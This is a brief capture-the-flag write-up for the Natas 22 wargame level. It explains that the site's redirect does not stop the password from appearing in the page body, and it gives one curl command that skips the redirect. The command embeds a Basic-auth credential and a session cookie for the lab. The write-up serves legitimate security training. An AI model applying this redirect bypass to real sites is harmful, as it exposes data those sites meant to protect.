# Natas 22

The site redirects us using the `Location` header to `/` if we set the `revelio` header but not an admin.

However, if we look down the source code, the password is revealed no matter we are
an admin or not, so it is just a client side security check.

Therefore, using a client that does not follow redirect would work (e.g. curl).

```bash
curl 'http://natas22.natas.labs.overthewire.org/?revelio=true' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Authorization: Basic bmF0YXMyMjo5MWF3Vk05b0RpVUdtMzNKZHpNN1JWTEJTOGJ6OW4wcw==' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=mj3am792ttg9c8b1qn7jnl2fkc' -H 'Upgrade-Insecure-Requests: 1'
```
